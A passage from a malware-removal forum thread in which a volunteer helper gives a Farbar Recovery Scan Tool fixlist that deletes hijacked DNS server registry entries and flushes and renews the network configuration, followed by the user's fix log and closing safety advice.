Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start


CreateRestorePoint:
CloseProcesses:

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [DhcpNameServer] 199.203.131.151

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

Reboot:

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Let me know of any problems.

#7 starblazers

starblazers
  • Topic Starter

  • Members
  • 56 posts
  • OFFLINE
  •  
  • Local time:06:56 AM

Posted 28 March 2018 - 08:41 PM

The laptop seemed slower than normal today when I tried to boot it up, and then it took forever for Chrome to load, but it didn't seem to redirect anything, it was just very slow in loading Chrome.

Fixlog as follows:

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Tech 14 (28-03-2018 19:51:21) Run:2
Running from C:\Users\Tech 14\Desktop
Loaded Profiles: Tech 14 (Available Profiles: Tech 14 & Meridian)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start


CreateRestorePoint:
CloseProcesses:

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [DhcpNameServer] 199.203.131.151

cmd: ipconfig /flushdns
cmd: IPCONFIG /release
cmd: IPCONFIG /renew

Reboot:

End
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\DhcpNameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}\\DhcpNameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}\\NameServer" => removed successfully
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}\\DhcpNameServer" => removed successfully

========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= IPCONFIG /release =========


Windows IP Configuration

No operation can be performed on Bluetooth Network Connection while it has its media disconnected.
No operation can be performed on Local Area Connection while it has its media disconnected.

Mobile Broadband adapter Mobile Broadband Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::b452:bcc0:c801:5e6b%15
   Default Gateway . . . . . . . . . :

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter Local Area Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : triad.rr.com

Tunnel adapter isatap.{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.{EB149C09-0ED4-4B3D-A3A2-FCB4397AF082}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.triad.rr.com:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.Home:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

========= End of CMD: =========


========= IPCONFIG /renew =========


Windows IP Configuration

No operation can be performed on Mobile Broadband Connection while it has its media disconnected.
No operation can be performed on Bluetooth Network Connection while it has its media disconnected.
No operation can be performed on Local Area Connection while it has its media disconnected.

Mobile Broadband adapter Mobile Broadband Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix  . : Home
   Link-local IPv6 Address . . . . . : fe80::b452:bcc0:c801:5e6b%15
   IPv4 Address. . . . . . . . . . . : 192.168.1.19
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.254

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter Local Area Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : triad.rr.com

Tunnel adapter isatap.{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.{EB149C09-0ED4-4B3D-A3A2-FCB4397AF082}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.triad.rr.com:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter isatap.Home:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

========= End of CMD: =========



The system needed a reboot.

==== End of Fixlog 19:51:55 ====



#8 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:06:56 AM

Posted 29 March 2018 - 07:23 AM

Hi,

Reset Chrome one more time.

Restart the computer and Chrome.

How is it now?

#9 nasdaq

nasdaq

  • Malware Response Team
  • 38,580 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:06:56 AM

Posted 04 April 2018 - 07:48 AM

Hi,

If all is well.

To learn more about how to protect yourself while on the internet read this little guide best security practices keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/


https://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/
Simple and easy ways to keep your computer safe and secure on the Internet.
===




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users